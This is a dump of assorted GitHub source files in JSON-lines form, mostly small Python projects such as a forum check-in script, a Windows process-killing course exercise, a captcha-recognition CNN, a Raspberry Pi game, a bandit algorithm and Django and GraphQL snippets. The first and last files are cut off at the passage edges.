meeting\n\t\tif j+1 < len(schedules[i]):\n\t\t\theapq.heappush(h, (schedules[i][j+1], j+1, i))\n\tif res + length <= 1440: # end of last meeting\n\t\treturn res\n\treturn -1\n\n\n\nschedules = [[[60,150],[180,240]], [[0,210],[360,420]]]\nlength = 120\nprint(add_new_meeting_for_all(schedules, length))\n# res = 240\n\nschedules = [[[480,510]], [[240,330]], [[375,400]]]\nlength = 180\nprint(add_new_meeting_for_all(schedules, length))\n# res = 0\n\nschedules = [[],[],[]]\nlength = 75\nprint(add_new_meeting_for_all(schedules, length))\n# res = 0\n\nschedules = [[[0,1439]],[[0,390],[480,510]],[]]\nlength = 90\nprint(add_new_meeting_for_all(schedules, length))\n# res = -1\n\n\n","repo_name":"xiaofanc/leetcode","sub_path":"CodeSignal/20230426/add-new-meeting-for-all-employees.py","file_name":"add-new-meeting-for-all-employees.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72355803892","text":"import pandas as pd\r\nimport os\r\nimport numpy as np\r\nimport json\r\n\r\n###########################################################\r\ndef collectStockName(filepath):\r\n '''\r\n Collect stock symbols with price data in specific dirs.\r\n \r\n Args:\r\n filepath(str): Filepath we want to collect stock tickers.\r\n \r\n Returns:\r\n stock_list(list): List of tickers that have CSV in specific filepath.\r\n '''\r\n stock_list=[]\r\n for root, dirs, files in os.walk(filepath):\r\n if files:\r\n for f in files:\r\n if 'csv' in f:\r\n stock_list.append(f.split('.csv')[0])\r\n return stock_list\r\n\r\n\r\n\r\n###########################################################\r\n\r\ndef check_and_create_dir(path):\r\n isExists=os.path.exists(path)\r\n if not isExists:\r\n os.makedirs(path) \r\n print ('{} is built successfully.'.format(path))\r\n else:\r\n print ('{} exists.'.format(path))\r\n\r\n\r\n#############\r\ndef collectFilenames(filepath, type = 'csv'):\r\n '''\r\n Collect stock symbols with price data in specific dirs.\r\n \r\n Args:\r\n filepath(str): Filepath we want to collect stock tickers.\r\n \r\n Returns:\r\n stock_list(list): List of tickers that have CSV in specific filepath.\r\n '''\r\n files_list=[]\r\n for root, dirs, files in os.walk(filepath):\r\n if files:\r\n for f in files:\r\n if type in f:\r\n files_list.append(f.split('.'+type)[0])\r\n return files_list\r\n\r\n \r\ndef saveContentsAsJson(contents,filepath,filename):\r\n with open(filepath+filename+'.json','w',encoding='utf-8') as json_file:\r\n json.dump(contents,json_file,ensure_ascii=False)\r\n \r\ndef loadJson(filepath,filename):\r\n with open(filepath+filename+'.json','r',encoding='utf-8') as json_file:\r\n contents=json.load(json_file)\r\n return contents","repo_name":"zwMargaretProject/BigW","sub_path":"textMining/general_functions.py","file_name":"general_functions.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"36874988542","text":"'''\n功能:mt论坛签到\nDate: 2023/02/21 \ncron: 30 10 * * *\nnew Env('MT论坛每日签到');\n'''\n#青龙环境变量: MTCOOKIE\n#填入完整cookies执行。\n#多账号用@隔开\n\nimport os\nimport re\nimport requests\nfrom notify import send\n\ncookie = os.environ.get(\"MTCOOKIE\") # 从环境变量中获取 Cookie\n\ndef main():\n try:\n headers = {\n \"cookie\": cookie,\n \"Referer\": \"https://bbs.binmt.cc/member.php?mod=logging&action=login&mobile=2\"\n }\n res = requests.get(\"https://bbs.binmt.cc/k_misign-sign.html\", headers=headers)\n formhash = re.search(r\"formhash=(.+?)&\", res.text)\n if formhash and \"登录\" not in res.text:\n signurl = f\"https://bbs.binmt.cc/k_misign-sign.html?operation=qiandao&format=button&formhash={formhash.group(1)}&inajax=1&ajaxtarget=midaben_sign\"\n res2 = requests.get(signurl, headers=headers)\n if \"今日已签\" in res2.text:\n msg = \"今天已经签到过啦\"\n elif \"签到成功\" in res2.text:\n msg1 = re.search(r\"获得随机奖励.+?金币\", res2.text).group()\n msg2 = re.search(r\"已累计签到 \\d+ 天\", res2.text).group()\n msg = f\"签到成功\\n{msg1}\\n{msg2}\"\n else:\n msg = \"签到失败!原因未知\"\n print(res2.text)\n else:\n msg = \"cookie失效\"\n print(msg)\n send(\"【MT论坛】签到通知\", msg + '\\n仓库地址:https://github.com/CoverUp137/jiaoben.git')\n except Exception as e:\n print(e)\n print(\"签到接口请求出错\")\n send(\"【MT论坛】签到通知\", \"签到接口请求出错\" + '\\n仓库地址:https://github.com/CoverUp137/jiaoben.git')\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"CoverUp137/jiaoben","sub_path":"mt.py","file_name":"mt.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71722670132","text":"\"\"\"\n Filename: proc_killer.py\n Description: Kills a process when give the window title. All code here written\n by me.\n NOTE-Input works through the PyCharm interpreter, but not when run from\n Powershell or Windows Command Prompt.\n\n Created by: Benjamin M. Singleton\n Created: 03-09-2020\n\"\"\"\n\nimport ctypes\n\n\ndef find_window_by_name(target_window_name, user_handle, k_handle):\n \"\"\"\n Finds the handle of a window, given the title of that window.\n :param target_window_name: Title of target window.\n :type target_window_name: ctypes.c_char_p\n :param user_handle: The handle for User32.DLL.\n :type user_handle: ctypes.WinDLL\n :param k_handle: The handle for Kernel32.DLL.\n :type k_handle: ctypes.WinDLL\n :return: Handle of the window.\n :rtype: ctypes.c_void_p\n \"\"\"\n lpClassName = None # optional, and we want flexibility\n lpWindowName = target_window_name\n response = user_handle.FindWindowA(lpClassName, lpWindowName)\n\n error = k_handle.GetLastError()\n\n if error != 0:\n print(\"Encountered error in FindWindowA call\")\n print(\"Error code: {0}\".format(error))\n exit(1)\n\n if response <= 0:\n print(\"The handle was not created\")\n exit(1)\n else:\n print(\"Handle was created: \" + str(response))\n\n return response\n\n\ndef process_id_by_window_handle(hWnd, user_handle, k_handle):\n \"\"\"\n Returns the process ID of the given window.\n :param hWnd: Handle of the desired window.\n :type hWnd: ctypes.c_void_p\n :param user_handle: The handle for User32.DLL.\n :type user_handle: ctypes.WinDLL\n :param k_handle: The handle for Kernel32.DLL.\n :type k_handle: ctypes.WinDLL\n :return: The desired process ID.\n :rtype: ctypes.c_ulong\n \"\"\"\n lpdwProcessId = ctypes.c_ulong() # this is the variable for the Process Id\n response = user_handle.GetWindowThreadProcessId(hWnd, ctypes.byref(lpdwProcessId))\n\n error = k_handle.GetLastError()\n\n if error != 0:\n print(\"Encountered error in GetWindowThreadProcessId call\")\n print(\"Error code: {0}\".format(error))\n exit(1)\n\n print(\"Window thread ID found: \" + str(response))\n print(\"But we're throwing that away because we only want the process ID: \" + str(lpdwProcessId))\n\n return lpdwProcessId\n\n\ndef open_process_by_id(process_id, k_handle):\n \"\"\"\n Creates a handle for accessing the process.\n :param process_id: The process ID of the target process.\n :type process_id: ctypes.c_ulong\n :param k_handle: The handle for Kernel32.DLL.\n :type k_handle: ctypes.WinDLL\n :return: The process handle.\n :rtype: ctypes.c_void_p\n \"\"\"\n dwDesiredAccess = (0x000F0000 | 0x00100000 | 0xFFF) # equivalent of PROCESS_ALL_ACCESS\n bInheritHandle = False # we're not spinning off other processes, so this is irrelevant\n dwProcessId = process_id\n\n process_handle = k_handle.OpenProcess(dwDesiredAccess, bInheritHandle, dwProcessId)\n\n error = k_handle.GetLastError()\n\n if error != 0:\n print(\"Encountered error in OpenProcess call\")\n print(\"Error code: {0}\".format(error))\n exit(1)\n\n if process_handle <= 0:\n print(\"The handle was not created\")\n exit(1)\n else:\n print(\"Handle was created: \" + str(process_handle))\n\n return process_handle\n\n\ndef kill_process(process_handle, k_handle):\n \"\"\"\n Terminates the specified process.\n :param process_handle: The open handle used to access the process.\n :type process_handle: ctypes.c_void_p\n :param k_handle: The handle for Kernel32.DLL.\n :type k_handle: ctypes.WinDLL\n \"\"\"\n hProcess = process_handle\n uExitCode = 0x1\n\n response = k_handle.TerminateProcess(hProcess, uExitCode)\n\n error = k_handle.GetLastError()\n\n if error != 0:\n print(\"Encountered error in TerminateProcess call\")\n print(\"Error code: {0}\".format(error))\n exit(1)\n\n if response == 0:\n print(\"TerminateProcess failed, yet there was no last error? Weird.\")\n exit(1)\n\n print(\"Succesfully killed target process\")\n\n\ndef main():\n # we'll use these handles in every function, they give Python access to these\n # two Windows DLLs\n user_handle = ctypes.WinDLL(\"User32.dll\")\n k_handle = ctypes.WinDLL(\"Kernel32.dll\")\n\n window_name = ctypes.c_char_p(input(\"Please enter the process name: \").encode('utf-8'))\n window_handle = find_window_by_name(window_name, user_handle, k_handle)\n process_id = process_id_by_window_handle(window_handle, user_handle, k_handle)\n process_handle = open_process_by_id(process_id, k_handle)\n kill_process(process_handle, k_handle)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"bsinglet/Windows_API_Python_Course","sub_path":"proc_killer.py","file_name":"proc_killer.py","file_ext":"py","file_size_in_byte":4661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73366436211","text":"import sys\nsys.path.insert(0, \"C:\\\\Users\\\\Marta\\\\source\\\\repos\\\\crunchy-taiyaki\\\\Speckle\\\\src\\\\modules\")\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom initial_parameters import DataFiles\nfrom power_spectrum import Data, remove_background\nfrom plot import define_ylim,slice_image\n\n\n#read config file\nfiles = DataFiles()\nfiles.read_input('C:\\\\Users\\\\Marta\\\\source\\\\repos\\\\crunchy-taiyaki\\\\Speckle\\\\src\\\\inputs\\\\TEST_star_input.txt')\nfiles.info()\n\n#read data from files\ndata = Data()\ndata.read_from(files.data)\n\nimage = data.star_ps.values\nnew_image = remove_background(data.star_ps.values,512)\n\nplt.figure()\nplt.imshow(image,cmap='gray',vmin=np.min(image),vmax=np.max(image)/1e8)\n\nplt.figure()\nplt.imshow(new_image,cmap='gray',vmin=np.min(new_image),vmax=np.max(new_image)/1e8)\n\nplt.figure()\nplt.plot(slice_image(data.star_ps.values,0,0,512,512),label='star ps')\nplt.plot(slice_image(remove_background(data.star_ps.values,512),0,0,512,512),label='rmbg star ps')\nymin,ymax = define_ylim(data.star_ps)\nplt.ylim(ymin,ymax)\nplt.yscale('log')\nplt.legend()\n\nplt.show()","repo_name":"crunchy-taiyaki/Speckle","sub_path":"src/tests/test_rmbg.py","file_name":"test_rmbg.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33642089883","text":"from TelloDrone import DRONE\n\n\ntelloA = DRONE()\n#telloB = DRONE()\ntelloA.set_ip(\"macaddr\")\n#telloB.set_ip(\"macaddr\")\ntelloA.get_ip()\ntelloA.battery_stat()\n# macアドレスを入力\n\ntelloA.fly_test()\n\nimport threading\n\n#2台を並列処理\n#threadA = threading.Thread(target=telloA.fly_test)\n#threadB = threading.Thread(target=telloB.fly_test)\n#threadA.start()\n#threadB.start()\n#threadA.join()\n#threadB.join()\n#print(\"テスト飛行の終了\")\n","repo_name":"codexu2021/Drone_python","sub_path":"example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14851541415","text":"##implementation of epsilon greedy algorithm\n\nimport numpy as np\nfrom random import randrange\nfrom multi_arm_bandits import bandits\nimport time \nfrom learning_algorithm.action_value import ActionValue \n\n\nclass epsilonAgent():\n def __init__(self):\n self.actionValue = ActionValue()\n \n def __choose_random(self):\n return np.random.randn()\n \n def __choose_best_arm(self):\n return np.argmax(self.estimate)\n\n def __choose_arm(self, epsilon, bandit, epoch):\n\n p = self.__choose_random()\n arm = 0\n if p < epsilon:\n arm = randrange(bandit.getNoArms())\n else:\n arm = self.actionValue.getBestArm()\n reward = bandit.pullArm(arm)\n stepsize = 1 / ( (epoch/ 50) + 1 )\n self.actionValue.updateEstimate(arm , reward, stepsize)\n\n\n def __step_reduce_epsilon(self, epsilon):\n if epsilon <= 0.3:\n return epsilon\n return epsilon - 0.1\n \n def Run(self, epoch, bandit):\n if epoch < 100:\n print(\"Minimum expected epoche is 100\")\n return\n \n epsilon = 0.9\n \n arms = bandit.getNoArms()\n self.actionValue.createRewardEstimates(arms)\n count = 1\n while count != epoch:\n self.__choose_arm(epsilon, bandit, count)\n count+=1\n if count % 300 == 0:\n epsilon = self.__step_reduce_epsilon(epsilon)\n \n def getBestEstimate(self):\n return self.actionValue.getBestArm()\n \n\n","repo_name":"ssivaguru/Reinforcement-Learning","sub_path":"learning_algorithm/epsilon_greedy.py","file_name":"epsilon_greedy.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18743713180","text":"from authcode.main2 import *\n\nnet = CNN_Network()\noptimizer = torch.optim.Adam(net.parameters(), lr=lr)\nloss = nn.MultiLabelSoftMarginLoss() # 多分类损失函数\n\n\ndef train(net, train_iter, test_iter, optimizer, loss, device, num_epochs):\n net = net.to(device)\n train_acc_list, test_acc_list, train_loss_list, test_loss_list = [], [], [], []\n flag = 0.0\n for epoch in range(num_epochs):\n train_loss, n = 0.0, 0\n for X, y in train_iter:\n X = X.to(device)\n y = y.to(device)\n y_hat = net(X)\n l = loss(y_hat, y)\n optimizer.zero_grad()\n l.backward()\n optimizer.step()\n train_loss += l.cpu().item()\n n += y.shape[0]\n print(\"train_loss=\", train_loss)\n train_acc = get_acc(net, train_iter, device)\n test_acc = get_acc(net, test_iter, device)\n print(\"test_acc=\", test_acc)\n if epoch >= 80:\n if test_acc > flag:\n ckpt_dir = '../authcode'\n save_path = os.path.join(ckpt_dir, 'model21.pth')\n torch.save({'state_dict': net.state_dict()}, save_path)\n flag = test_acc\n train_acc_list.append(train_acc)\n test_acc_list.append(test_acc)\n\n\ndef get_acc(net, data_iter, device):\n acc_sum, n = 0, 0\n for X, y in data_iter:\n X = X.to(device)\n y = y.to(device)\n y_hat = net(X)\n pre1 = torch.argmax(y_hat[:, :62], dim=1)\n real1 = torch.argmax(y[:, :62], dim=1)\n pre2 = torch.argmax(y_hat[:, 62:124], dim=1)\n real2 = torch.argmax(y[:, 62:124], dim=1)\n pre3 = torch.argmax(y_hat[:, 124:186], dim=1)\n real3 = torch.argmax(y[:, 124:186], dim=1)\n pre4 = torch.argmax(y_hat[:, 186:], dim=1)\n real4 = torch.argmax(y[:, 186:], dim=1)\n pre_lable = torch.cat((pre1, pre2, pre3, pre4), 0).view(4, -1)\n real_label = torch.cat((real1, real2, real3, real4), 0).view(4, -1)\n bool_ = (pre_lable == real_label).transpose(0, 1)\n n += y.shape[0]\n for i in range(0, y.shape[0]):\n if bool_[i].int().sum().item() == 4:\n acc_sum += 1\n return acc_sum / n\n\n\nif __name__ == \"__main__\":\n\n if not os.path.exists('img/train'):\n os.mkdir('img/train')\n if not os.path.exists('img/test'):\n os.mkdir('img/test')\n\n epoch = 200\n batch_size = 256\n lr = 0.001\n\n # train_dataset = MyDataSet('./img/train')\n # train_loader = DataLoader(train_dataset, shuffle=True, batch_size=batch_size,num_workers=0)\n # test_dataset = MyDataSet('./img/test')\n # test_loader = DataLoader(test_dataset, shuffle=True, batch_size=batch_size,num_workers=0)\n\n net = CNN_Network()\n optimizer = torch.optim.Adam(net.parameters(), lr=lr)\n\n loss = nn.MultiLabelSoftMarginLoss()\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n train(net, train_loader, test_loader, optimizer, loss, device, epoch)","repo_name":"Alohawsq/pytorch-CAPTCHA","sub_path":"train2.py","file_name":"train2.py","file_ext":"py","file_size_in_byte":2977,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"4281859090","text":"import pygame\nimport random\nimport spidev\nimport time\nimport RPi.GPIO as GPIO\n\n# 버튼과 연결된 GPIO 핀 번호를 리스트로 저장\nbutton_pins = [25]\n\n# 21번 핀 설정\nGPIO.setmode(GPIO.BCM) \nGPIO.setup(21, GPIO.OUT)\nGPIO.output(21, GPIO.HIGH) # LED 켜기\n\n# 버튼 핀을 입력으로 설정\nfor pin in button_pins:\n GPIO.setup(pin, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\n\n# 버튼의 이전 입력 상태 저장\nprevious_input = [GPIO.LOW] * len(button_pins)\n\n# MCP3008의 SPI 버스와 CS(Chip Select) 핀 설정\nspi = spidev.SpiDev()\nspi.open(0, 0)\nspi.max_speed_hz = 1350000\nspi.mode = 0\ncs = 8\n\n# MCP3008에서 아날로그 값 읽기\ndef read_adc(adcnum):\n if adcnum < 0 or adcnum > 7:\n return -1\n r = spi.xfer2([1, (8 + adcnum) << 4, 0])\n adcout = ((r[1] & 3) << 8) + r[2]\n return adcout\n\n# 조이스틱의 초기 위치값\nx_initial = 502\ny_initial = 517\n\n# 조이스틱의 현재 위치값 계산\ndef read_joystick():\n x = read_adc(0)\n y = read_adc(1)\n x_diff = x - x_initial\n y_diff = y - y_initial\n return x_diff, y_diff\n \n# 초기화\npygame.init()\n\n# 화면 설정\nscreen_width = 640\nscreen_height = 480\nscreen = pygame.display.set_mode((screen_width, screen_height))\npygame.display.set_caption(\"숫자 맞추기 게임\")\n\n# 색상 설정\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\n\n# 시계 설정\nclock = pygame.time.Clock()\n\n# 글꼴 설정\nfont = pygame.font.Font(None, 30)\n\n# 게임 루프\ndef game():\n # 변수 초기화\n answer = random.randint(1, 100)\n guess = 50\n game_over = False\n\n # 게임 루프\n while not game_over:\n # 이벤트 처리\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n game_over = True\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT:\n guess -= 1\n elif event.key == pygame.K_RIGHT:\n guess += 1\n elif event.key == pygame.K_UP:\n if guess == answer:\n display_message(\"get the right answer\")\n else:\n display_message(\"That’s a wrong answer.\")\n guess = 50\n answer = random.randint(1, 100)\n \n for i, pin in enumerate(button_pins):\n # 버튼의 현재 입력 상태\n input_state = GPIO.input(pin)\n # 버튼 입력 상태가 변경되면 출력\n if input_state != previous_input[i]:\n previous_input[i] = input_state\n if input_state == GPIO.HIGH:\n GPIO.output(21, GPIO.LOW)\n pygame.quit() \n \n # 조이스틱 값 읽어들이기\n x_diff, y_diff = read_joystick()\n if x_diff < -100:\n guess -= 1\n elif x_diff > 100:\n guess += 1\n elif y_diff < -100:\n if guess == answer:\n display_message(\"get the right answer\")\n else:\n display_message(\"That’s a wrong answer.\")\n guess = 50\n answer = random.randint(1, 100)\n \n # 화면 업데이트\n screen.fill(WHITE)\n\n # 텍스트 표시\n guess_text = \"Guess: \" + str(guess)\n label = font.render(guess_text, True, BLACK)\n screen.blit(label, (screen_width/2-50, screen_height/2-50))\n\n # 화면 업데이트\n pygame.display.update()\n\n # 초당 프레임 설정\n clock.tick(60)\n\n\n# 메시지 표시\ndef display_message(message):\n # 메시지 텍스트 표시\n text = font.render(message, True, BLACK)\n text_rect = text.get_rect(center=(screen_width/2, screen_height-30))\n screen.blit(text, text_rect)\n \n # 화면 업데이트\n pygame.display.update()\n \n # 2초 대기\n pygame.time.wait(2000)\n\n# 게임 실행\ngame()\n\n# 게임 종료시 LED 끄기\nGPIO.output(21, GPIO.LOW)\n\n# GPIO 설정 해제\nGPIO.cleanup()\n\n# 게임 종료\npygame.quit()\n","repo_name":"cantstoptolaugh/Raspi_GPIOGameController","sub_path":"숫자 맞추기.py","file_name":"숫자 맞추기.py","file_ext":"py","file_size_in_byte":4065,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22174547332","text":"def nonNegativeFloatValidation(prompt, errorMessage):\n number = input(prompt)\n try:\n float_number = float(number)\n if float_number > 0:\n return float_number\n else:\n print(errorMessage)\n return nonNegativeFloatValidation(prompt, errorMessage)\n\n except Exception as ex:\n print(errorMessage)\n return nonNegativeFloatValidation(prompt, errorMessage)\n\n\ndef readOilPrices(prices, noOfCountries):\n valid_continent = ['Asia', 'Africa', 'Europe',\n 'North America', 'South America', 'Australia', 'Antarctica']\n\n for i in range(int(noOfCountries)):\n country = input(f'enter the name of country {i+1}: ')\n price = nonNegativeFloatValidation(\n f\"Enter the oil price in '{country}': \", 'The number of countries must be a positive number greater than zero. ')\n\n continent = ''\n while continent not in valid_continent:\n continent = input(\n f\"{country} is located in which continent?: \").title()\n\n prices.append(country)\n prices.append(price)\n prices.append(continent)\n\n return prices\n\n\nnum_of_countries = nonNegativeFloatValidation(\n 'Enter the number of countries: ', 'The number of countries must be a positive number greater than zero. ')\nprices = readOilPrices([], num_of_countries)\n\nprint(prices)\n\n\ndef listOilPrices(prices):\n string = ''\n\n string += f'--------------------------------------------------\\n{\"Country\":<14}{\"Oil Price\":<14}{\"Continent\":<14}\\n--------------------------------------------------'\n\n for i in range(len(prices)):\n if i % 3 == 0:\n\n string += f'\\n{prices[i]:<14}'\n else:\n string += f'{prices[i]:<14} '\n string += '\\n--------------------------------------------------'\n return string\n\n\noutput = listOilPrices(prices)\nprint(output)\n","repo_name":"mostafa-sadeghi/maryam_rahimi","sub_path":"__pycache__/past/ass2.py","file_name":"ass2.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1967915626","text":"from nonebot import on_request, RequestSession\n\nfrom config import GROUP_LIST, GROUP_ADMIN\n\n\n@on_request('group')\nasync def _(session: RequestSession):\n print(session.ctx)\n if session.ctx['group_id'] in GROUP_LIST:\n await session.approve()\n user_id = session.ctx['user_id']\n await session.send(GROUP_ADMIN + f'[CQ:at,qq={user_id}]')","repo_name":"Gensonotsuki/qqbot","sub_path":"ALLplugins/plugins/group_admin.py","file_name":"group_admin.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72774142774","text":"from asgiref.sync import async_to_sync\nfrom channels.db import database_sync_to_async\nfrom channels.generic.websocket import AsyncJsonWebsocketConsumer\n\nfrom django.core import serializers\n\nclass NotificationConsumer(AsyncJsonWebsocketConsumer):\n async def websocket_connect(self, event):\n print(\"CONNECTED\", event)\n\n await self.channel_layer.group_add(\n f\"notification_group_{self.scope['url_route']['kwargs']['user_id']}\",\n self.channel_name\n )\n\n await self.accept()\n \n context = await self.get_notification_info(self.scope)\n\n await self.send_json(content=context)\n\n async def websocket_disconnect(self, event):\n print(\"DISCONNECTED\", event)\n\n async def websocket_receive(self, event):\n print(\"RECEIVE\", event)\n await self.send(text_data='HELLO')\n\n async def notification_info(self,event):\n context = await self.get_notification_info(self.scope)\n\n await self.send_json(content=context)\n\n @database_sync_to_async\n def get_notification_info(self,scope):\n if not scope['user'].is_authenticated:\n context = {\n 'unreaded_notification_count':'',\n 'unreaded_notifications':'',\n 'old_notifications':''\n }\n return context\n\n notifications = scope['user'].notifications_assigned_to_user.order_by('-creation_date')\n old_notifications = notifications.filter(is_read=True)\n unreaded_notifications = notifications.filter(is_read=False).order_by('creation_date')\n\n context = {\n 'unreaded_notification_count':unreaded_notifications.count(),\n 'unreaded_notifications':serializers.serialize('json',unreaded_notifications),\n 'old_notifications':serializers.serialize('json',old_notifications[:3])\n }\n\n return context","repo_name":"JangasCodingplace/NotificationApplication","sub_path":"Notification/consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"} +{"seq_id":"20119392628","text":"#!/usr/bin/env python\n\nimport sys, os\n\n_file = None\ndef svg(filename):\n global _file\n if _file:\n _file.close()\n _file = open(filename, \"wt\")\n\ndef svg2png(nm):\n os.system(\"inkscape -z -e %s.png %s.svg\" % (nm, nm))\n os.unlink(nm + \".svg\")\n\ndef p(s):\n if _file:\n _file.write(s)\n _file.write('\\n')\n else:\n sys.stdout.write(s)\n sys.stdout.write('\\n')\n\ndef start(width, height):\n p(\"\"\"<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"no\"?>\n<svg\n xmlns:dc=\"http://purl.org/dc/elements/1.1/\"\n xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\"\n xmlns:svg=\"http://www.w3.org/2000/svg\"\n xmlns=\"http://www.w3.org/2000/svg\"\n width=\"%d\"\n height=\"%d\"\n viewBox=\"0 0 %d %d\"\n version=\"1.1\" >\n <g id=\"layer1\">\"\"\" % (width, height, width, height))\n\ndef end():\n p(\"</g></svg>\")\n\ndef ellipse(cx, cy, rx, ry, style, add = None):\n if not add:\n add = \"\"\n p(\"<ellipse style=\\\"%s\\\" cx=\\\"%f\\\" cy=\\\"%f\\\" rx=\\\"%f\\\" ry=\\\"%f\\\" %s />\" % (style, cx, cy, rx, ry, add))\n\ndef rect(x, y, width, height, ry, style, add = None):\n if not add:\n add = \"\"\n p('<rect style=\"%s\" x=\"%f\" y=\"%f\" width=\"%f\" height=\"%f\" ry=\"%f\" %s />' % (style, x, y, width, height, ry, add))\n\ndef transform(rotate = None, scale_x = None, scale_y = None, translate_x = None, translate_y = None):\n s = \"\"\n if rotate:\n if isinstance(rotate, tuple):\n a = rotate[0]\n cx = rotate[1] if len(rotate) > 1 else 0.0\n cy = rotate[2] if len(rotate) > 2 else 0.0\n s = s + \" rotate(%f %f %f)\" % (a, cx, cy)\n else:\n s = s + \" rotate(%f)\" % rotate\n if scale_x or scale_y:\n if scale_x is None:\n scale_x = 1.0\n if scale_y is None:\n scale_y = 1.0\n s = s + \" scale(%f %f)\" % (scale_x, scale_y)\n if translate_x or translate_y:\n if translate_x is None:\n translate_x = 0.0\n if translate_y is None:\n translate_y = 0.0\n s = s + \" translate(%f %f)\" % (translate_x, translate_y)\n if s:\n return 'transform=\"%s\"' % s\n else:\n return \"\"\n\ndef man(a1, a2, ah, scale_x):\n start(50, 100)\n\n translate_x = 0.0\n if scale_x < 0.96 or scale_x > 1.04:\n translate_x = 25 * (1.0 - scale_x)\n # Head:\n ellipse(25, 25, 16, 14, \"fill:#000000\", transform(rotate = (ah, 25, 25), scale_x = scale_x, translate_x = translate_x))\n # Body:\n ellipse(25, 55, 13, 17, \"fill:#000000\", transform(rotate = (-ah, 25, 55), scale_x = scale_x, translate_x = translate_x))\n\n # Eyes:\n ellipse(20, 25, 3, 2, \"fill:#0000ff\", transform(scale_x = scale_x, translate_x = translate_x))\n ellipse(30, 25, 3, 2, \"fill:#0000ff\", transform(scale_x = scale_x, translate_x = translate_x))\n\n # Leaps:\n ellipse(25, 35, 7, 1, \"fill:#ff5555\", transform(scale_x = scale_x, translate_x = translate_x))\n\n # Legs:\n rect(15, 65, 5, 25, 4, \"fill:#000000\", transform(scale_x = scale_x, rotate = (a1, 15, 65), translate_x = translate_x))\n rect(30, 65, 5, 25, 4, \"fill:#000000\", transform(scale_x = scale_x, rotate = (a2, 30, 65), translate_x = translate_x))\n\n # Hands:\n rect(10, 45, 5, 18, 2.5, \"fill:#000000\", transform(rotate = (a1, 20, 45), scale_x = scale_x, translate_x = translate_x))\n rect(35, 45, 5, 18, 2.5, \"fill:#000000\", transform(rotate = (a2, 45, 45), scale_x = scale_x, translate_x = translate_x))\n\n end()\n\n# Walk:\nfor i in range(5):\n svg(\"walk-%d.svg\" % i)\n man(0, -3.0 * i, i, 1.0)\nfor i in range(5):\n svg(\"walk-%d.svg\" % (i + 5))\n man(3.0 * i, -15, (4 - i), 1.0)\nfor i in range(5):\n svg(\"walk-%d.svg\" % (i + 10))\n man(15, -3.0 * (4 - i), -i, 1.0)\nfor i in range(5):\n svg(\"walk-%d.svg\" % (i + 15))\n man(3.0 * (4 - i), 0, (i - 4), 1.0)\n\n# Rotate:\nfor i in range(5):\n svg(\"rotate-%d.svg\" % i)\n man(0, 0, 0, 0.2 * (5.0 - i))\n\nfor i in range(6):\n svg(\"rotate-%d.svg\" % (i + 5))\n man(0, 0, 0, 0.2 * i if i > 0 else 0.1)\n\n_file.close()\n_file = None\n\nfor i in range(20):\n svg2png(\"walk-%d\" % i)\nfor i in range(11):\n svg2png(\"rotate-%d\" % i)\n\n# Generate test figure:\nsvg(\"test.svg\")\nstart(80, 80)\nrect(0, 30, 80, 20, 4, \"fill:#aa1010\")\nrect(30, 0, 20, 80, 4, \"fill:#aa1010\")\nend()\n_file.close()\n\nsvg2png(\"test\")\n\n","repo_name":"rymis/robolang","sub_path":"src/img/man_gen.py","file_name":"man_gen.py","file_ext":"py","file_size_in_byte":4268,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"23153973640","text":"from graphql import GraphQLError\nfrom sqlalchemy.orm import load_only\n\nfrom schemas.domains import (\n\tDomains,\n\tDomainModel\n)\n\nfrom schemas.organizations import (\n\tOrganizations,\n\tOrganizationsModel\n)\n\n\n# Resolvers\ndef resolve_get_domain_by_id(self, info, **kwargs):\n\t\"\"\"Return a domain by its row ID\"\"\"\n\tgroup_id = kwargs.get('id', 1)\n\tquery = Domains.get_query(info).filter(\n\t\tDomainModel.id == group_id\n\t)\n\tif not len(query.all()):\n\t\traise GraphQLError(\"Error, Invalid ID\")\n\treturn query.all()\n\n\ndef resolve_get_domain_by_domain(self, info, **kwargs):\n\t\"\"\"Return a domain by a url\"\"\"\n\tdomain = kwargs.get('url')\n\tquery = Domains.get_query(info).filter(\n\t\tDomainModel.domain == domain\n\t)\n\tif not len(query.all()):\n\t\traise GraphQLError(\"Error, domain does not exist\")\n\treturn query.all()\n\n\ndef resolve_get_domain_by_organization(self, info, **kwargs):\n\t\"\"\"Return a list of domains by by 